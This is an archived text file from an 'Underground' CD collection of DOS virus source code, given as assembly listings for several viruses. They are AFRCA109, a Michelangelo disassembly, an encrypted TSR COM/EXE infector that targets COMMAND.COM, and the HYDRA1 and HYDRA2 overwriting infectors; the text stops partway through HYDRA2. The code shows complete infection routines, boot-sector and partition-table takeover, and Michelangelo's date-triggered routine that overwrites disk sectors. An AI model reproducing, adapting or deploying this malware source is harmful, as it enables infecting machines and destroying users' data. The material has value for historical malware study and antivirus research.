home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / virgen / virusgen / V0001.DAT < prev    next >
Encoding:
Text File  |  1996-05-27  |  128.0 KB  |  5,167 lines

  1.  
  2. ;██████████████████████████████████████████████████████████████████████████
  3. ;██                                         ██
  4. ;██                    AFRCA109                     ██
  5. ;██                                         ██
  6. ;██      Created:   16-Sep-92                             ██
  7. ;██      Passes:    5           Analysis Options on: AW                 ██
  8. ;██                                         ██
  9. ;██████████████████████████████████████████████████████████████████████████
  10.  
  11. data_2e        equ    4F43h
  12. data_3e        equ    0FE00h
  13.  
  14. seg_a        segment    byte public
  15.         assume    cs:seg_a, ds:seg_a
  16.  
  17.  
  18.         org    100h
  19.  
  20. afrca109    proc    far
  21.  
  22. start:
  23.         mov    si,100h
  24.         push    si
  25.         mov    ax,cs
  26.         add    ah,10h
  27.         mov    es,ax
  28.         xor    di,di            ; Zero register
  29.         mov    cx,6Dh
  30.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  31.         mov    dx,data_3e
  32.         mov    ah,1Ah
  33.         int    21h            ; DOS Services  ah=function 1Ah
  34.                         ;  set DTA(disk xfer area) ds:dx
  35.         mov    dx,167h
  36.         mov    ah,4Eh            ; 'N'
  37.         jmp    short loc_2
  38. loc_1:
  39.         mov    ah,3Eh            ; '>'
  40.         int    21h            ; DOS Services  ah=function 3Eh
  41.                         ;  close file, bx=file handle
  42.         mov    ah,4Fh            ; 'O'
  43. loc_2:
  44.         push    cs
  45.         pop    ds
  46.         int    21h            ; DOS Services  ah=function 4Fh
  47.                         ;  find next filename match
  48.         mov    cx,0FE1Eh
  49.         jc    loc_3            ; Jump if carry Set
  50.         mov    dx,cx
  51.         mov    ax,3D02h
  52.         int    21h            ; DOS Services  ah=function 3Dh
  53.                         ;  open file, al=mode,name@ds:dx
  54.         xchg    ax,bx
  55.         push    es
  56.         pop    ds
  57.         mov    dx,di
  58.         mov    ah,3Fh            ; '?'
  59.         int    21h            ; DOS Services  ah=function 3Fh
  60.                         ;  read file, bx=file handle
  61.                         ;   cx=bytes to ds:dx buffer
  62.         add    ax,6Dh
  63.         cmp    byte ptr [di],0BEh
  64.         je    loc_1            ; Jump if equal
  65.         push    ax
  66.         xor    cx,cx            ; Zero register
  67.         mov    ax,4200h
  68.         cwd                ; Word to double word
  69.         int    21h            ; DOS Services  ah=function 42h
  70.                         ;  move file ptr, bx=file handle
  71.                         ;   al=method, cx,dx=offset
  72.         pop    cx
  73.         mov    ah,40h            ; '@'
  74.         int    21h            ; DOS Services  ah=function 40h
  75.                         ;  write file  bx=file handle
  76.                         ;   cx=bytes from ds:dx buffer
  77.         jmp    short loc_1
  78. loc_3:
  79.         push    cs
  80.         pop    es
  81.         mov    bl,0FCh
  82.         mov    word ptr [bx],0AAACh
  83.         mov    word ptr [bx+2],0FCE2h
  84.         pop    di
  85.         push    bx
  86.         retn
  87.         sub    ch,ds:data_2e
  88.         dec    bp
  89.         add    bl,al
  90.  
  91. afrca109    endp
  92.  
  93. seg_a        ends
  94.  
  95.  
  96.  
  97.         end    start
  98.  
  99. done
  100.  
  101. ; This is a disassembly of the much-hyped michelangelo virus.
  102. ; As you can see, it is a derivative of the Stoned virus.  The
  103. ; junk bytes at the end of the file are probably throwbacks to
  104. ; the Stoned virus.  In any case, it is yet another boot sector
  105. ; and partition table infector.
  106.  
  107. michelangelo    segment byte public
  108.         assume  cs:michelangelo, ds:michelangelo
  109. ; Disassembly by Dark Angel of PHALCON/SKISM
  110.         org     0
  111.  
  112.         jmp     entervirus
  113. highmemjmp      db      0F5h, 00h, 80h, 9Fh
  114. maxhead         db      2                       ; used by damagestuff
  115. firstsector     dw      3
  116. oldint13h       dd      0C8000256h
  117.  
  118. int13h:
  119.         push    ds
  120.         push    ax
  121.         or      dl, dl                  ; default drive?
  122.         jnz     exitint13h              ; exit if not
  123.         xor     ax, ax
  124.         mov     ds, ax
  125.         test    byte ptr ds:[43fh], 1   ; disk 0 on?
  126.         jnz     exitint13h              ; if not spinning, exit
  127.         pop     ax
  128.         pop     ds
  129.         pushf
  130.         call    dword ptr cs:[oldint13h]; first call old int 13h
  131.         pushf
  132.         call    infectdisk              ; then infect
  133.         popf
  134.         retf    2
  135. exitint13h:     pop     ax
  136.         pop     ds
  137.         jmp     dword ptr cs:[oldint13h]
  138.  
  139. infectdisk:
  140.         push    ax
  141.         push    bx
  142.         push    cx
  143.         push    dx
  144.         push    ds
  145.         push    es
  146.         push    si
  147.         push    di
  148.         push    cs
  149.         pop     ds
  150.         push    cs
  151.         pop     es
  152.         mov     si, 4
  153. readbootblock:
  154.         mov     ax,201h                 ; Read boot block to
  155.         mov     bx,200h                 ; after virus
  156.         mov     cx,1
  157.         xor     dx,dx
  158.         pushf
  159.         call    oldint13h
  160.         jnc     checkinfect             ; continue if no error
  161.         xor     ax,ax
  162.         pushf
  163.         call    oldint13h               ; Reset disk
  164.         dec     si                      ; loop back
  165.         jnz     readbootblock
  166.         jmp     short quitinfect        ; exit if too many failures
  167. checkinfect:
  168.         xor     si,si
  169.         cld
  170.         lodsw
  171.         cmp     ax,[bx]                 ; check if already infected
  172.         jne     infectitnow
  173.         lodsw
  174.         cmp     ax,[bx+2]               ; check again
  175.         je      quitinfect
  176. infectitnow:
  177.         mov     ax,301h                 ; Write old boot block
  178.         mov     dh,1                    ; to head 1
  179.         mov     cl,3                    ; sector 3
  180.         cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
  181.         je      is360Kdisk
  182.         mov     cl,0Eh
  183. is360Kdisk:
  184.         mov     firstsector,cx
  185.         pushf
  186.         call    oldint13h
  187.         jc      quitinfect              ; exit on error
  188.         mov     si,200h+offset partitioninfo
  189.         mov     di,offset partitioninfo
  190.         mov     cx,21h                  ; Copy partition table
  191.         cld
  192.         rep     movsw
  193.         mov     ax,301h                 ; Write virus to sector 1
  194.         xor     bx,bx
  195.         mov     cx,1
  196.         xor     dx,dx
  197.         pushf
  198.         call    oldint13h
  199. quitinfect:
  200.         pop     di
  201.         pop     si
  202.         pop     es
  203.         pop     ds
  204.         pop     dx
  205.         pop     cx
  206.         pop     bx
  207.         pop     ax
  208.         retn
  209. entervirus:
  210.         xor     ax,ax
  211.         mov     ds,ax
  212.         cli
  213.         mov     ss,ax
  214.         mov     ax,7C00h                ; Set stack to just below
  215.         mov     sp,ax                   ; virus load point
  216.         sti
  217.         push    ds                      ; save 0:7C00h on stack for
  218.         push    ax                      ; later retf
  219.         mov     ax,ds:[13h*4]
  220.         mov     word ptr ds:[7C00h+offset oldint13h],ax
  221.         mov     ax,ds:[13h*4+2]
  222.         mov     word ptr ds:[7C00h+offset oldint13h+2],ax
  223.         mov     ax,ds:[413h]            ; memory size in K
  224.         dec     ax                      ; 1024 K
  225.         dec     ax
  226.         mov     ds:[413h],ax            ; move new value in
  227.         mov     cl,6
  228.         shl     ax,cl                   ; ax = paragraphs of memory
  229.         mov     es,ax                   ; next line sets seg of jmp
  230.         mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
  231.         mov     ax,offset int13h
  232.         mov     ds:[13h*4],ax
  233.         mov     ds:[13h*4+2],es
  234.         mov     cx,offset partitioninfo
  235.         mov     si,7C00h
  236.         xor     di,di
  237.         cld
  238.         rep     movsb                   ; copy to high memory
  239.                         ; and transfer control there
  240.         jmp     dword ptr cs:[7C00h+offset highmemjmp]
  241. ; destination of highmem jmp
  242.         xor     ax,ax
  243.         mov     es,ax
  244.         int     13h                     ; reset disk
  245.         push    cs
  246.         pop     ds
  247.         mov     ax,201h
  248.         mov     bx,7C00h
  249.         mov     cx,firstsector
  250.         cmp     cx,7                    ; hard disk infection?
  251.         jne     floppyboot              ; if not, do floppies
  252.         mov     dx,80h                  ; Read old partition table of
  253.         int     13h                     ; first hard disk to 0:7C00h
  254.         jmp     short exitvirus
  255. floppyboot:
  256.         mov     cx,firstsector          ; read old boot block
  257.         mov     dx,100h                 ; to 0:7C00h
  258.         int     13h
  259.         jc      exitvirus
  260.         push    cs
  261.         pop     es
  262.         mov     ax,201h                 ; read boot block
  263.         mov     bx,200h                 ; of first hard disk
  264.         mov     cx,1
  265.         mov     dx,80h
  266.         int     13h
  267.         jc      exitvirus
  268.         xor     si,si
  269.         cld
  270.         lodsw
  271.         cmp     ax,[bx]                 ; is it infected?
  272.         jne     infectharddisk          ; if not, infect HD
  273.         lodsw                           ; check infection
  274.         cmp     ax,[bx+2]
  275.         jne     infectharddisk
  276. exitvirus:
  277.         xor     cx,cx                   ; Real time clock get date
  278.         mov     ah,4                    ; dx = mon/day
  279.         int     1Ah
  280.         cmp     dx,306h                 ; March 6th
  281.         je      damagestuff
  282.         retf                            ; return control to original
  283.                         ; boot block @ 0:7C00h
  284. damagestuff:
  285.         xor     dx,dx
  286.         mov     cx,1
  287. smashanothersector:
  288.         mov     ax,309h
  289.         mov     si,firstsector
  290.         cmp     si,3
  291.         je      smashit
  292.         mov     al,0Eh
  293.         cmp     si,0Eh
  294.         je      smashit
  295.         mov     dl,80h                  ; first hard disk
  296.         mov     maxhead,4
  297.         mov     al,11h
  298. smashit:
  299.         mov     bx,5000h                ; random memory area
  300.         mov     es,bx                   ; at 5000h:5000h
  301.         int     13h                     ; Write al sectors to drive dl
  302.         jnc     skiponerror             ; skip on error
  303.         xor     ah,ah                   ; Reset disk drive dl
  304.         int     13h
  305. skiponerror:
  306.         inc     dh                      ; next head
  307.         cmp     dh,maxhead              ; 2 if floppy, 4 if HD
  308.         jb      smashanothersector
  309.         xor     dh,dh                   ; go to next head/cylinder
  310.         inc     ch
  311.         jmp     short smashanothersector
  312. infectharddisk:
  313.         mov     cx,7                    ; Write partition table to
  314.         mov     firstsector,cx          ; sector 7
  315.         mov     ax,301h
  316.         mov     dx,80h
  317.         int     13h
  318.         jc      exitvirus
  319.         mov     si,200h+offset partitioninfo ; Copy partition
  320.         mov     di,offset partitioninfo      ; table information
  321.         mov     cx,21h
  322.         rep     movsw
  323.         mov     ax,301h                 ; Write to sector 8
  324.         xor     bx,bx                   ; Copy virus to sector 1
  325.         inc     cl
  326.         int     13h
  327. ;*              jmp     short 01E0h
  328.         db      0EBh, 32h               ; ?This should crash?
  329. ; The following bytes are meaningless.
  330. garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
  331. partitioninfo:  db      42h dup (0)
  332. michelangelo    ends
  333.         end
  334.  
  335. done
  336.  
  337. LOC_21        EQU    21H*4
  338. REAL_SIZE    equ    offset EOF
  339.  
  340. CODE    SEGMENT    PARA PUBLIC 'CODE'
  341.     ASSUME CS:CODE, DS:CODE
  342.     ORG 0h
  343.  
  344. VBUG    PROC    FAR
  345.     nop
  346.     call    MASTER_UNCODE
  347. VB01:
  348.     call    VB00
  349. VB00:
  350.     pop    bp
  351.     sub    BP, +7
  352.     mov    ax, -1
  353.     int    21h
  354.     or    ah, ah
  355.     je    GO_PROG
  356.  
  357.     push    ds
  358.     xor    ax, ax
  359.     mov    ds, ax                    ;BIOS data area
  360.     sub    word ptr ds:[0413H], 2
  361.     lds    bx, ds:[LOC_21]
  362.     mov    word ptr cs:[BP]+offset OLD_21, bx
  363.     mov    word ptr cs:[BP]+offset OLD_21+2, ds ;Get interrupt 21h vector
  364.     mov    bx, es
  365.     dec    bx
  366.     mov    ds, bx
  367.     sub    word ptr ds:[0003H], 2048/16    ;Paragraph size
  368.     mov    ax, ds:[0012H]            ;Get high memory segment
  369.     sub    ax, 2048/16            ;Make room for ourself
  370.     mov    ds:[0012H], ax            ;Save it
  371.     mov    es, ax
  372.     push    cs
  373.     pop    ds
  374.     mov    si, bp            ;Put 0000 into SI (if EXE..)
  375.     xor    di, di
  376.     mov    cx, REAL_SIZE+4         ;Plus OLD_21 information!
  377.     cld
  378.     rep    movsb
  379.     mov    ds, cx            ;Put zero into DS
  380.     cli                ;Disable maskable interrupts
  381.     mov    word ptr ds:LOC_21, offset NEW_21
  382.     mov    word ptr ds:LOC_21+2, ax
  383.     sti                ;Enable interrupts
  384.     mov    ax, 4BFFH        ;Infect COMMAND.COM file!
  385.     int    21h
  386.     pop    ds
  387.     push    ds
  388.     pop    es
  389.  
  390. GO_PROG:                ;Check if EXE or COM program?
  391.     or    bp, bp            ;Are we an EXE file?
  392.     je    RUN_EXE
  393.  
  394. RUN_COM:                ;Run this infected .COM file
  395.     lea    si, [BP]+offset RUN_PROG
  396.     mov    di, 100H
  397.     push    di
  398.     cld
  399.     movsw
  400.     movsw
  401. DUMB_ROUTINE PROC NEAR
  402.     ret                ;Do a local return
  403. DUMB_ROUTINE ENDP
  404.  
  405. RUN_EXE:
  406.     mov    ax, es            ;Get PSP segment
  407.     add    cs:word ptr RUN_PROG+2, ax    ;Reallocate entry segment
  408.  
  409.     db    0EAh            ;JMP 0000:0000
  410.  
  411. RUN_PROG    db    0B4H, 04CH
  412.         db    0CDH, 021H
  413. NEW_21:
  414.     cmp    ax, -1
  415.     jne    NW00
  416.     inc    ax                ;Overflow to 0000
  417.     iret
  418. NW00:
  419.     cmp    ah, 4Bh                ;Infect program being executed
  420.     jne    RUN_OLD_21
  421.     cmp    al, 03
  422.     je    RUN_OLD_21
  423.     cmp    al, -1
  424.     jne    RO00
  425.     push    cs
  426.     pop    ds
  427.     mov    dx, offset COMMAND_FILE
  428.     call    INFECT_PROGRAM
  429.     IRET
  430. RO00:
  431.     call    INFECT_PROGRAM
  432.  
  433. RUN_OLD_21:
  434.     jmp    dword ptr cs:OLD_21    ;Do original interrupt
  435.  
  436. INFECT_PROGRAM    PROC    NEAR
  437. ;
  438. ;When entering a normal Int 21/AH=4BH
  439. ;DS:DX -> Ptr to filename
  440. ;ES:BX -> Ptr to Parm Block
  441. ;AL    -> 0 - Load/Run, 3 - Overlay
  442. ;
  443.     push    es
  444.     push    ds
  445.     push    dx
  446.     push    cx
  447.     push    bx
  448.     push    ax
  449. ;    push    si
  450. ;    push    di
  451.  
  452.     mov    ax, 4300H        ;Get file attribute
  453.     call    DO_21
  454.     jb    NO_CLOSE
  455.     test    cl, 00000001b
  456.     je    VB04
  457.     and    cl, 11111110b        ;Turn off bit 0 (so you can write)
  458.     mov    ax, 4301H        ;Set file attribute
  459.     call    DO_21
  460.     jb    NO_CLOSE
  461.  
  462. VB04:
  463.     mov    ax, 3D02h        ;Open file for reading & writing
  464.     call    DO_21
  465. VB05:
  466.     JNB    VB06
  467. NO_CLOSE:
  468.     JMP    END_21
  469. VB06:
  470.  
  471.     mov    bx, ax            ;Put new handle into BX
  472.     push    cs
  473.     pop    ds
  474.  
  475.     mov    ax, 5700H        ;Get file date
  476.     call    DO_21
  477.     mov    ds:FILE_TIME, cx
  478.     mov    ds:FILE_DATE, dx
  479.  
  480.     mov    dx, offset TMP_HEADER    ;Load in COM/EXE ? file header
  481.     mov    cx, 1BH            ;Size of header (for EXE, it doesn't
  482.                     ;matter the extra bytes loaded for
  483.                     ;COM files.
  484.     mov    ah, 3Fh            ;Read from file
  485.     call    DO_21
  486. VB10:
  487.     jb    CLOSE_END
  488.  
  489.     cmp    word ptr ds:SIGN, 'ZM'        ;Is this an EXE file? (MZ)
  490.     je    INFECT_EXE
  491.  
  492. INFECT_COM:
  493.     mov    al, byte ptr SIGN+1
  494.     cmp    al, byte ptr SIGN+3
  495.     je    CLOSE_END
  496.  
  497.     xor    dx, dx
  498.     xor    cx, cx
  499.     mov    ax, 4202H            ;Seek from EOF
  500.     call    DO_21
  501. VB15:
  502.     jb    CLOSE_END
  503.  
  504. ;Returns DX:AX number of bytes seeked (Size of file)
  505.  
  506.     cmp    ax, 0E000H            ;Check file size
  507.     ja    CLOSE_END
  508.     push    ax
  509.     mov    ax, ds:word ptr [SIGN+0]
  510.     mov    word ptr ds:RUN_PROG+0, ax
  511.     mov    ax, ds:word ptr [SIGN+2]
  512.     mov    word ptr ds:RUN_PROG+2, ax
  513.     pop    ax
  514.     sub    ax, 3                ;Calculate jmp to End of file
  515.     mov    byte ptr ds:SIGN+0, 0E9H    ;JMP FAR
  516.     mov    word ptr ds:SIGN+1, ax
  517.     mov    byte ptr ds:SIGN+3, al        ;Identification code
  518.  
  519.     jmp    FINISH_INFECT
  520.  
  521. ;From here in, both EXE & COM files are infected the same
  522. ;The virus is written, seek to start of file, and re-write the Header
  523.  
  524. INFECT_EXE:
  525.     cmp    word ptr ds:START_IP, 1
  526.     jne    VB19
  527. VB18:
  528. CLOSE_END:
  529.     jmp    END_INFECT
  530. VB19:
  531.     mov    ax, ds:[FILE_SIZE]        ;Get file size
  532.     mov    cx, 200H
  533.     mul    cx                ;Convert to bytes offset
  534.  
  535. ;If filesize, if bigger then 64K, the overflow is put into DX
  536.  
  537.     push    ax
  538.     push    dx
  539.     mov    cl, 04h
  540.     ror    dx, cl
  541.     shr    ax, cl                ;Convert to paragraphs
  542.     add    ax, dx
  543.     sub    ax, ds:SIZE_HEADER
  544.     PUSH    AX
  545.     mov    ax, ds:START_IP
  546.     mov     word ptr ds:RUN_PROG, ax
  547.     mov    ax, ds:START_CS
  548.     add    ax, 0010H
  549.     mov    word ptr ds:RUN_PROG+2, ax
  550.     POP    AX
  551.     mov    word ptr ds:START_CS, ax
  552.     mov    word ptr ds:START_IP, +1
  553.     inc    word ptr ds:FILE_SIZE
  554.  
  555.     pop    cx
  556.     pop    dx
  557.     mov    ax, 4200H            ;Goto end of file
  558.     call    DO_21
  559. VB20:
  560.     jb    VB25
  561.  
  562. FINISH_INFECT:
  563.     xor    ds:byte ptr [DC00]+1, 08h    ;Toggle NEG/NOT
  564.  
  565.     xor    ax, ax
  566.     mov    ds, ax
  567.     mov    AL, byte ptr ds:[46CH]    ;Lowest byte of timer count
  568.     push    cs
  569.     pop    ds
  570.     push    cs
  571.     pop    es
  572.     mov    ds:[CODE_BYTE], AL    ;Put high byte of file seek
  573.     xor    si, si
  574.     mov    di, offset REAL_EOF
  575.     push    di            ;Push pointer
  576.     mov    cx, offset EOF
  577.     cld
  578.     rep    movsb
  579.     mov    si, offset REAL_EOF+04H    ;REAL_EOF+VB01
  580.     call    DECODE
  581.     pop    dx            ;Restore pointer
  582.     mov    cx, REAL_SIZE
  583.     mov    ah, 40h
  584.     call    DO_21
  585.     JB    END_INFECT
  586.  
  587.     xor    cx, cx
  588.     xor    dx, dx            ;Distance to seek into file
  589.     mov    ax, 4200h        ;Seek from start of file
  590.     call    DO_21
  591.     jb    END_INFECT
  592.  
  593.     mov    dx, offset TMP_HEADER    ;Ptr to New modified header
  594.     mov    cx, 1BH            ;Size of header
  595.     mov    ah, 40h            ;Write to file
  596.     call    DO_21
  597.  
  598. VB25:
  599. END_INFECT:
  600.     mov    dx, ds:FILE_DATE
  601.     mov    cx, ds:FILE_TIME
  602.     mov    ax, 5701h        ;Set file date/time
  603.     call    DO_21
  604.  
  605. CLOSE_FILE:
  606.     mov    ah, 3Eh            ;Close the file
  607.     call    DO_21
  608. END_21:
  609. ;    pop    di
  610. ;    pop    si
  611.     pop    ax
  612.     pop    bx
  613.     pop    cx
  614.     pop    dx
  615.     pop    ds
  616.     pop    es
  617.     RET
  618.  
  619. DO_21:
  620.     pushf
  621.     call    dword ptr cs:OLD_21
  622.     ret
  623.  
  624. COMMAND_FILE    DB    'C:\COMMAND.COM',0
  625.  
  626. MASTER_DECODE:
  627. CODE_BYTE    DB    80H
  628.  
  629. MASTER_UNCODE:
  630.     POP    SI
  631.     PUSH    SI
  632.     MOV    AL, BYTE PTR CS:[SI+CODE_BYTE-OFFSET VB01]
  633. DECODE:
  634.     MOV    CX, OFFSET MASTER_DECODE-OFFSET VB01
  635. DC00:
  636.     NOT    AL
  637.     XOR    CS:BYTE PTR [SI], AL
  638.     INC    SI
  639.     LOOP    DC00
  640.     RET
  641.  
  642. INFECT_PROGRAM    ENDP
  643.  
  644. EOF:
  645.  
  646. OLD_21        DD    ?
  647.  
  648. FILE_TIME    DW    ?
  649. FILE_DATE    DW    ?
  650.  
  651. TMP_HEADER:
  652. SIGN        DW    ?
  653. LEN_IMAGE_MOD    DW    ?
  654. FILE_SIZE    DW    ?        ;In 512-increments
  655. NUM_REAL    DW    ?
  656. SIZE_HEADER    DW    ?
  657. MIN_ABOVE    DW    ?
  658. MAX_ABOVE    DW    ?
  659. STACK_SS    DW    ?
  660. STACK_SP    DW    ?
  661. CHECKSUM    DW    ?
  662. START_IP    DW    ?
  663. START_CS    DW    ?
  664. DISPLAY_REAL    DW    ?
  665. OVERLAY_NUM    DW    ?
  666.  
  667. REAL_EOF:
  668.  
  669. VBUG    ENDP
  670.  
  671. CODE    ENDS
  672.     END    VBUG
  673.  
  674. done
  675.  
  676. ;██████████████████████████████████████████████████████████████████████████
  677. ;██                                         ██
  678. ;██                    HYDRA1                         ██
  679. ;██                                         ██
  680. ;██      Created:   27-Aug-91                             ██
  681. ;██      Passes:    5           Analysis Options on: AW                 ██
  682. ;██      Copyright (c)                                 ██
  683. ;██                                         ██
  684. ;██████████████████████████████████████████████████████████████████████████
  685.  
  686. psp_cmd_size    equ    80h
  687. data_12e    equ    100h
  688. data_13e    equ    193h
  689. data_14e    equ    196h
  690. data_15e    equ    271h
  691. data_16e    equ    293h
  692.  
  693. seg_a        segment    byte public
  694.         assume    cs:seg_a, ds:seg_a
  695.  
  696.  
  697.         org    100h
  698.  
  699. hydra1        proc    far
  700.  
  701. start:
  702.         jmp    loc_1
  703.         pop    cx
  704.         inc    sp
  705.         add    [bx+si],al
  706. data_3        db    'HyDra-1   Beta - Not For Release'
  707.         db    '. *.CO?'
  708.         db    0
  709. data_6        dw    0, 8B39h
  710. data_8        dw    0
  711. data_9        db    0
  712.         db    29 dup (0)
  713. data_10        db    0
  714.         db    13 dup (0)
  715. data_11        db    'HYDRA$'
  716. copyright    db    'Copyright (c)'
  717.         db    '  1991 by C.A.V.E.  $'
  718. loc_1:
  719.         push    ax
  720.         mov    ax,cs
  721.         add    ax,1000h
  722.         xor    di,di            ; Zero register
  723.         mov    cx,193h
  724.         mov    si,100h
  725.         mov    es,ax
  726.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  727.         mov    ah,1Ah
  728.         mov    dx,offset data_9
  729.         int    21h            ; DOS Services  ah=function 1Ah
  730.                         ;  set DTA(disk xfer area) ds:dx
  731.         mov    ah,4Eh            ; 'N'
  732.         mov    dx,offset data_3+22h    ; ('*')
  733.         int    21h            ; DOS Services  ah=function 4Eh
  734.                         ;  find 1st filenam match @ds:dx
  735.         jc    loc_5            ; Jump if carry Set
  736. loc_2:
  737.         mov    ah,3Dh            ; '='
  738.         mov    al,2
  739.         mov    dx,offset data_10
  740.         mov    al,2
  741.         int    21h            ; DOS Services  ah=function 3Dh
  742.                         ;  open file, al=mode,name@ds:dx
  743.         mov    bx,ax
  744.         push    es
  745.         pop    ds
  746.         mov    ax,3F00h
  747.         mov    cx,0FFFFh
  748.         mov    dx,data_13e
  749.         int    21h            ; DOS Services  ah=function 3Fh
  750.                         ;  read file, bx=file handle
  751.                         ;   cx=bytes to ds:dx buffer
  752.         add    ax,193h
  753.         mov    cs:data_8,ax
  754.         cmp    word ptr ds:data_14e,4459h
  755.         jne    loc_3            ; Jump if not equal
  756.         mov    ah,3Eh            ; '>'
  757.         int    21h            ; DOS Services  ah=function 3Eh
  758.                         ;  close file, bx=file handle
  759.         push    cs
  760.         pop    ds
  761.         mov    ah,4Fh            ; 'O'
  762.         int    21h            ; DOS Services  ah=function 4Fh
  763.                         ;  find next filename match
  764.         jc    loc_6            ; Jump if carry Set
  765.         jmp    short loc_2
  766. loc_3:
  767.         xor    cx,cx            ; Zero register
  768.         mov    dx,cx
  769.         mov    ax,4200h
  770.         int    21h            ; DOS Services  ah=function 42h
  771.                         ;  move file ptr, bx=file handle
  772.                         ;   al=method, cx,dx=offset
  773.         jc    loc_4            ; Jump if carry Set
  774.         mov    ah,40h            ; '@'
  775.         xor    dx,dx            ; Zero register
  776.         mov    cx,cs:data_8
  777.         int    21h            ; DOS Services  ah=function 40h
  778.                         ;  write file  bx=file handle
  779.                         ;   cx=bytes from ds:dx buffer
  780. loc_4:
  781.         mov    ah,3Eh            ; '>'
  782.         int    21h            ; DOS Services  ah=function 3Eh
  783.                         ;  close file, bx=file handle
  784.         push    cs
  785.         pop    ds
  786. loc_5:
  787.         mov    ah,1Ah
  788.         mov    dx,psp_cmd_size
  789.         int    21h            ; DOS Services  ah=function 1Ah
  790.                         ;  set DTA(disk xfer area) ds:dx
  791.         jmp    short loc_7
  792.         nop
  793. loc_6:
  794.         push    dx
  795.         xor    ax,ax            ; Zero register
  796.         mov    ax,0F00h
  797.         int    10h            ; Video display   ah=functn 0Fh
  798.                         ;  get state, al=mode, bh=page
  799.                         ;   ah=columns on screen
  800.         mov    ah,0
  801.         int    10h            ; Video display   ah=functn 00h
  802.                         ;  set display mode in al
  803.         mov    ax,200h
  804.         mov    dh,6
  805.         mov    dl,25h            ; '%'
  806.         int    10h            ; Video display   ah=functn 02h
  807.                         ;  set cursor location in dx
  808.         xor    dx,dx            ; Zero register
  809.         mov    dx,offset data_11    ; ('HYDRA')
  810.         mov    ah,9
  811.         int    21h            ; DOS Services  ah=function 09h
  812.                         ;  display char string at ds:dx
  813.         mov    ax,200h
  814.         mov    dh,17h
  815.         mov    dl,0
  816.         int    10h            ; Video display   ah=functn 02h
  817.                         ;  set cursor location in dx
  818.         mov    dx,offset copyright    ; ('Copyright (c)')
  819.         mov    ah,9
  820.         int    21h            ; DOS Services  ah=function 09h
  821.                         ;  display char string at ds:dx
  822.         mov    ax,200h
  823.         mov    dh,18h
  824.         mov    dl,0
  825.         int    10h            ; Video display   ah=functn 02h
  826.                         ;  set cursor location in dx
  827.         mov    ax,3504h
  828.         int    21h            ; DOS Services  ah=function 35h
  829.                         ;  get intrpt vector al in es:bx
  830.         mov    ax,es
  831.         mov    dx,bx
  832.         mov    ds,ax
  833.         mov    ax,2509h
  834.         int    21h            ; DOS Services  ah=function 25h
  835.                         ;  set intrpt vector al to ds:dx
  836.         mov    ax,0
  837.         int    21h            ; DOS Services  ah=function 00h
  838.                         ;  terminate, cs=progm seg prefx
  839. loc_7:
  840.         xor    di,di            ; Zero register
  841.         mov    si,data_15e
  842.         mov    cx,22h
  843.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  844.         pop    bx
  845.         mov    cs:data_6,0
  846.         mov    word ptr cs:data_6+2,es
  847.         pop    bx
  848.         jmp    dword ptr cs:data_6
  849.         push    ds
  850.         pop    es
  851.         mov    cx,0FFFFh
  852.         mov    si,data_16e
  853.         mov    di,data_12e
  854.         sub    cx,si
  855.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  856.         mov    word ptr cs:[100h],100h
  857.         mov    word ptr cs:[102h],ds
  858.         mov    ax,bx
  859.         jmp    dword ptr cs:[100h]
  860.         int    20h            ; DOS program terminate
  861.  
  862. hydra1        endp
  863.  
  864. seg_a        ends
  865.  
  866.  
  867.  
  868.         end    start
  869.  
  870.  
  871. done
  872.  
  873. ;██████████████████████████████████████████████████████████████████████████
  874. ;██                                         ██
  875. ;██                    HYDRA2                         ██
  876. ;██                                         ██
  877. ;██      Created:   27-Aug-91                             ██
  878. ;██      Passes:    5           Analysis Options on: AW                 ██
  879. ;██      Copyright (c)                                 ██
  880. ;██                                         ██
  881. ;██████████████████████████████████████████████████████████████████████████
  882.  
  883. data_1e        equ    100h
  884. data_2e        equ    235h
  885. data_3e        equ    257h
  886. data_4e        equ    522h
  887. psp_cmd_size    equ    80h
  888. data_15e    equ    157h
  889. data_16e    equ    15Ah
  890.  
  891. seg_a        segment    byte public
  892.         assume    cs:seg_a, ds:seg_a
  893.  
  894.  
  895.         org    100h
  896.  
  897. hydra2        proc    far
  898.  
  899. start:
  900.         jmp    loc_1
  901.         pop    cx
  902.         inc    sp
  903.         add    [bx+si],al
  904. data_7        db    'HyDra-2   Beta - Not For Release'
  905.         db    '. *.CO?'
  906.         db    0
  907. data_10        dw    0, 8B39h
  908. data_12        dw    0
  909. data_13        db    0
  910.         db    29 dup (0)
  911. data_14        db    0
  912.         db    13 dup (0)
  913. copyright    db    'Copyright (c)'
  914.         db    '  1991 by C.A.V.E.  '
  915. loc_1:
  916.         push    ax
  917.         mov    ax,cs
  918.         add    ax,1000h
  919.         xor    di,di            ; Zero register
  920.         mov    cx,157h
  921.         mov    si,100h
  922.         mov    es,ax
  923.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  924.         mov    ah,1Ah
  925.         mov    dx,offset data_13
  926.         int    21h            ; DOS Services  ah=function 1Ah
  927.                         ;  set DTA(disk xfer area) ds:dx
  928.         mov    ah,4Eh            ; 'N'
  929.         mov    dx,offset data_7+22h    ; ('*')
  930.         int    21h            ; DOS Services  ah=function 4Eh
  931.                         ;  find 1st filenam match @ds:dx
  932.         jc    loc_5            ; Jump if carry Set
  933. loc_2:
  934.         mov    ah,3Dh            ; '='
  935.         mov    al,2
  936.         mov    dx,offset data_14
  937.         mov    al,2
  938.         int    21h            ; DOS Services  ah=function 3Dh
  939.                         ;  open file, al=mode,name@ds:dx
  940.         mov    bx,ax
  941.         push    es
  942.         pop    ds
  943.         mov    ax,3F00h
  944.         mov    cx,0FFFFh
  945.         mov    dx,data_15e
  946.         int    21h            ; DOS Services  ah=function 3Fh
  947.                         ;  read file, bx=file handle
  948.                         ;   cx=bytes to ds:dx buffer
  949.         add    ax,157h
  950.         mov    cs:data_12,ax
  951.         cmp    word ptr ds:data_16e,4459h
  952.         jne    loc_3            ; Jump if not equal
  953.         mov    ah,3Eh            ; '>'
  954.         int    21h            ; DOS Services  ah=function 3Eh
  955.                         ;  close file, bx=file handle
  956.         push    cs
  957.         pop    ds
  958.         mov    ah,4Fh            ; 'O'
